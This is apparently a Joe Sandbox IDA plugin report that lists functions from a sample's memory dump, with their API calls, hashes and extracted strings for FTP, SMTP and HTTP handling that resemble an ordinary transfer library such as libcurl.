String ID: %u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$5$GMT
API String ID: 1992661772-2745433430
Opcode ID: f7d45d491ffc59ba0642802e0cd135c572968e7ed8ee4768c38fdc812830af52
Instruction ID: 47c48d86cdeb73738169995e3c7a5444b8dfa5cb94d196606d94863cc54576e9
Opcode Fuzzy Hash: f7d45d491ffc59ba0642802e0cd135c572968e7ed8ee4768c38fdc812830af52
Instruction Fuzzy Hash: 0F11F331A0C68580EB999F24E0500A9B775EB41781FD4D031D2AE062D8DFBCE952C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD45F8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DD4650

Strings

ytes, xrefs: 00007FF7F1DD4672
Couldn't use REST, xrefs: 00007FF7F1DD462C
RETR %s, xrefs: 00007FF7F1DD4649

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: Couldn't use REST$RETR %s$ytes
API String ID: 1488884202-3544981324
Opcode ID: adcd97b2576f6450e2bd1cb7ecb3e934a5e487811f40243ceb9467e42d56fb76
Instruction ID: 6d3c375585659eb161f7c69d3cfa204577854238ad15ae928d1da3bf78f5dd38
Opcode Fuzzy Hash: adcd97b2576f6450e2bd1cb7ecb3e934a5e487811f40243ceb9467e42d56fb76
Instruction Fuzzy Hash: 1521E561D1C68285FB64BB24A4407F8B7B0AF64365FC01231E97F06AD5DFACE581CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA0590 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,00007FF7F1DA06E3,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF7F1DA05BE
__swprintf_l.LIBCMT ref: 00007FF7F1DA0624
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,00007FF7F1DA06E3,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF7F1DA0636

Strings

%s%s, xrefs: 00007FF7F1DA0617

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: FileModuleName__swprintf_lfopen
String ID: %s%s
API String ID: 3556930314-3252725368
Opcode ID: 3fa6b3d57e66f1a6e0ac0f9c7fdfc62a7c539cec841c2add17cc1eaa0e81cd95
Instruction ID: c7b82bb5be818fa27983fef2ece97565fcd45dca001fc3276be8316fc323691a
Opcode Fuzzy Hash: 3fa6b3d57e66f1a6e0ac0f9c7fdfc62a7c539cec841c2add17cc1eaa0e81cd95
Instruction Fuzzy Hash: B811D621A0CA828AE714EF21A404069F370EB44790FD84631DE7D437DACFBDE145C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DCE11C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DCE1BC

Strings

RCPT failed: %d, xrefs: 00007FF7F1DCE15A
DATA, xrefs: 00007FF7F1DCE1AE
RCPT failed: %d (last error), xrefs: 00007FF7F1DCE194

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: DATA$RCPT failed: %d$RCPT failed: %d (last error)
API String ID: 1488884202-1745847639
Opcode ID: b37ceb7ab1f7b361cb274e0592d0d1dd2680f803acec9d1cc71b1d44ace40dac
Instruction ID: 65a69b73553d232bac00389eb0b032e91f206b0fc71aa8975f6586aa55bd0eb0
Opcode Fuzzy Hash: b37ceb7ab1f7b361cb274e0592d0d1dd2680f803acec9d1cc71b1d44ace40dac
Instruction Fuzzy Hash: 8111E4B1E0824681FB54AB0594403F86BB09BA6784FA44536D92E173C0CFACE659D7F1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DCDCF0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DCDD63
__swprintf_l.LIBCMT ref: 00007FF7F1DCDD71

Strings

RCPT TO:<%s@%s>, xrefs: 00007FF7F1DCDD57
RCPT TO:<%s>, xrefs: 00007FF7F1DCDD6A

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: RCPT TO:<%s>$RCPT TO:<%s@%s>
API String ID: 1488884202-579818044
Opcode ID: 9ea9468e732df66a82df04fe33071f3a10e4da38e33876a87e21011f90b75632
Instruction ID: c6d44aaf7baddc7ade8a9d27c6190ba9e90134539cd7d7fc70ef1b506cc0d495
Opcode Fuzzy Hash: 9ea9468e732df66a82df04fe33071f3a10e4da38e33876a87e21011f90b75632
Instruction Fuzzy Hash: 45116372F08B8681EB00EB16D5402A9A7B0FB98FC0F948532DA5C13395DF78E556C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD6EF8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FF7F1DD6F32
WSAGetLastError.WS2_32 ref: 00007FF7F1DD6F3C

Strings

Sending data failed (%d), xrefs: 00007FF7F1DD6F42
SENT, xrefs: 00007FF7F1DD6F57

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLastsend
String ID: SENT$Sending data failed (%d)
API String ID: 1802528911-3459338696
Opcode ID: 3c56ca7545b9722e0ea20f6805c17460fb7b7f2cd4c2adfaff9836402d2ed8a5
Instruction ID: 91c2321bb4aaa567a2eb66a07d97968ac37a6b812417bb143e78f39b9746205f
Opcode Fuzzy Hash: 3c56ca7545b9722e0ea20f6805c17460fb7b7f2cd4c2adfaff9836402d2ed8a5
Instruction Fuzzy Hash: C601F732B1879281EB14AB2AF840469BB70EBC8FD4F855130DE2D47795CFA8D545C3D0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD38F4 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DD3964

Strings

Failed EPSV attempt. Disabling EPSV, xrefs: 00007FF7F1DD3932
PASV, xrefs: 00007FF7F1DD394C
Failed EPSV attempt, exiting, xrefs: 00007FF7F1DD391F

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: Failed EPSV attempt, exiting$Failed EPSV attempt. Disabling EPSV$PASV
API String ID: 1488884202-1523041377
Opcode ID: 55d3ebdaf43cc84e23d39b84e223a5ef60d52015cf950b910b20940fb3a58374
Instruction ID: a537aa8536048b9db50ffb7b90868845213cc950bdba36a6a086b624263d55d1
Opcode Fuzzy Hash: 55d3ebdaf43cc84e23d39b84e223a5ef60d52015cf950b910b20940fb3a58374
Instruction Fuzzy Hash: 63016DA2D0C1C265FB55EB24E5443B8E7A4EB04788F884132DA6D065C5CFBCA594C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE442C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 00007FF7F1DE4443
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DE4453
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DE4486

Strings

%s/%s, xrefs: 00007FF7F1DE443C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _scwprintf_strdupfree
String ID: %s/%s
API String ID: 3289749495-2758257063
Opcode ID: 1af5d54ccb8866b7ce120fc8528325686a59531db20074365c90e5db1c5f1883
Instruction ID: 89b9e4a0ac6aeefab579cac5397ae89a539dcde040b790ccdaaad1b7e9b7413a
Opcode Fuzzy Hash: 1af5d54ccb8866b7ce120fc8528325686a59531db20074365c90e5db1c5f1883
Instruction Fuzzy Hash: 4FF04910B19A4781EF48BB16A994175D3B0AF48FC2F848430CE2E477E9EFACE00093E1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D93620 Relevance: 6.3, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9363D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D93662
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D93687
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D936AC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D936D1

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 23bcfd8c3edb1cac29dd381e654b8375a78a08816616135fa5c85e0b472d848f
Instruction ID: d30c117de8f416e7d3105f37c203444027e1ce567aaf5edc827603743160c851
Opcode Fuzzy Hash: 23bcfd8c3edb1cac29dd381e654b8375a78a08816616135fa5c85e0b472d848f
Instruction Fuzzy Hash: 0D21BD11A1C60252FB09BF21E8553B4E3B4BF44B45F984534C52E0A2D6DFECE55483F5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9A62C Relevance: 6.1, APIs: 4, Instructions: 80fileCOMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF7F1D9A7A6,?,?,?,?,00007FF7F1D911A7), ref: 00007FF7F1D9A69E
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00007FF7F1D9A7A6,?,?,?,?,00007FF7F1D911A7), ref: 00007FF7F1D9A6EB
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00007FF7F1D9A7A6,?,?,?,?,00007FF7F1D911A7), ref: 00007FF7F1D9A6FC
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00007FF7F1D9A7A6,?,?,?,?,00007FF7F1D911A7), ref: 00007FF7F1D9A71C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: fputs$fwrite
String ID:
API String ID: 2206100360-0
Opcode ID: d90cca3f9f52b75eb44e4aebd10a70a3eef004018b0bccdaa5a65b8deab42047
Instruction ID: f971ae0e780a787ac93678cb3d6531921446ecfc7be3a840290691693f6ffdc2
Opcode Fuzzy Hash: d90cca3f9f52b75eb44e4aebd10a70a3eef004018b0bccdaa5a65b8deab42047
Instruction Fuzzy Hash: BB31C122A09A9688EF59BF12D404678BB71AB44BE4FC94531CE7E073D4DFACD445C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9FE2C Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

fread.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9FE93
ferror.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9FE9F
feof.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9FEC7

Part of subcall function 00007FF7F1DA3AE0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA3B1B

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9FEEF

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: free$feofferrorfread
String ID:
API String ID: 1112580154-0
Opcode ID: 88eb16a64edb0a1782bf3c22edacdb774f5f6a0ba533ae2af922033d424e51c2
Instruction ID: 377284f067eba82a08c43a0b63219a7e680a1e51873d7e115aa83c425a0ab466
Opcode Fuzzy Hash: 88eb16a64edb0a1782bf3c22edacdb774f5f6a0ba533ae2af922033d424e51c2
Instruction Fuzzy Hash: C5219433A18A8186F764AF11E4403BAA3B0FB98BC9F844530EF9D466C9DFBCD5448790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DBC2A8 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1D93E4C: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D93E89

strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DBC2F3

Strings

unlimited, xrefs: 00007FF7F1DBC2E7
%256s "%64[^"]", xrefs: 00007FF7F1DBC2D6
., xrefs: 00007FF7F1DBC315

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __stdio_common_vsscanfstrcmp
String ID: %256s "%64[^"]"$.$unlimited
API String ID: 2755920870-3006405630
Opcode ID: db51d43b7f1cca94d1fbabe5f87adf4572fb1b03b0003fa92f7bf93387f4e27c
Instruction ID: 9680fa4ce5dc8d11365e6edf8e9d1e07e4be389b70bad602bce9744aecea5977
Opcode Fuzzy Hash: db51d43b7f1cca94d1fbabe5f87adf4572fb1b03b0003fa92f7bf93387f4e27c
Instruction Fuzzy Hash: 49018862A0D54765EB60E725E4113EAA3E0BF88794FC00232D9BE476D5DF6CD2058750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DBBB58 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F1DBBB8C

Part of subcall function 00007FF7F1DC585C: inet_pton.WS2_32 ref: 00007FF7F1DC5881
Part of subcall function 00007FF7F1DC585C: inet_pton.WS2_32 ref: 00007FF7F1DC5898

Strings

includesubdomains, xrefs: 00007FF7F1DBBC91
max-age=, xrefs: 00007FF7F1DBBBD8

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: inet_pton$_time64
String ID: includesubdomains$max-age=
API String ID: 868955570-1235841791
Opcode ID: 7b4f4ac11aa12f1fac02e8d9753075ba89dcabaa571770545086b8f4b6c3ed27
Instruction ID: a719b6ba1d7e19dfc4050725426d7dc3a83611f28b258f840dba9decc225c287
Opcode Fuzzy Hash: 7b4f4ac11aa12f1fac02e8d9753075ba89dcabaa571770545086b8f4b6c3ed27
Instruction Fuzzy Hash: 6661D311A0D54726EB30EA2998202BAA7B0BF46B94FD85534DDBF073C5CFACE405D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DC2910 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 00007FF7F1DC2BF1

Strings

No URL set, xrefs: 00007FF7F1DC299F
User-Agent: %s, xrefs: 00007FF7F1DC2BE3

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _scwprintf
String ID: No URL set$User-Agent: %s
API String ID: 1992661772-339178133
Opcode ID: ecd00fcfe8e6a6c97b516f028ba885befd069a452db79180db5b53cce118799f
Instruction ID: 9aa42aa4afd74234facaafed87be6c8aa242671d9a635d9e41d6bc4081b14a76
Opcode Fuzzy Hash: ecd00fcfe8e6a6c97b516f028ba885befd069a452db79180db5b53cce118799f
Instruction Fuzzy Hash: 9DA13D32708782A6E75CEB25D6802E9E7A4FB08B80F840539D77D43791DFA8B571C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D91C50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1DA3014: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,00007FF7F1D910B6), ref: 00007FF7F1DA3026

__swprintf_l.LIBCMT ref: 00007FF7F1D91E4A
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D91E6E

Strings

%%-%ds %%5.1f%%%%, xrefs: 00007FF7F1D91E39

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: CounterPerformanceQuery__swprintf_lfflush
String ID: %%-%ds %%5.1f%%%%
API String ID: 1637530157-3852588901
Opcode ID: a56a55fe8d58a428a17a0f6b834ab27ede2f4beac54648f5b7925a888f4a79cc
Instruction ID: 81393700961d89929eb32f2bd19c6b928bbc211b1f99480a67703a32dd602a03
Opcode Fuzzy Hash: a56a55fe8d58a428a17a0f6b834ab27ede2f4beac54648f5b7925a888f4a79cc
Instruction Fuzzy Hash: 84612622B0468686DB25EB26E5403BAE7A5EF547D0FC44231DE6D47BC5DFBCE0418740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DC014C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DC02B2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00000000,00000200,00000000,0000022F,00000200), ref: 00007FF7F1DC035A

Strings

%lx, xrefs: 00007FF7F1DC02A3

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l_errno
String ID: %lx
API String ID: 1766030736-1448181948
Opcode ID: 87625db4246a367d9eedabe39b3ecc180280514238f58691ef4228dad3b3b527
Instruction ID: e0e29e0cf0f2e4493d4a3aecaa117e7ce6756d79d5b9619e6abf36e32c9f86e2
Opcode Fuzzy Hash: 87625db4246a367d9eedabe39b3ecc180280514238f58691ef4228dad3b3b527
Instruction Fuzzy Hash: 35515932A0C68246FB319A14A4803B9E3E1BB85744F985A35DDAE536C4DFFED881C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD4418 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DD44F2

Strings

The file does not exist, xrefs: 00007FF7F1DD4560
Content-Length: %I64d, xrefs: 00007FF7F1DD44E3

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: Content-Length: %I64d$The file does not exist
API String ID: 1488884202-3816122970
Opcode ID: c10d070390f022191f4fe82a2c769e3a609e3e8c1dbc79cc72eee7241d2a4a27
Instruction ID: a58f395e59c6623468a892e4688841213edc171956fd8e6809d88871c62e0e13
Opcode Fuzzy Hash: c10d070390f022191f4fe82a2c769e3a609e3e8c1dbc79cc72eee7241d2a4a27
Instruction Fuzzy Hash: 0A512A22B18A9242FB24EB1599502B8B3B1EF54BA4FC44231DA7D07FD5DFACF5518390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD2590 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 00007FF7F1DD26A5

Strings

FTP response aborted due to select/poll error: %d, xrefs: 00007FF7F1DD26AB
FTP response timeout, xrefs: 00007FF7F1DD26C4

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
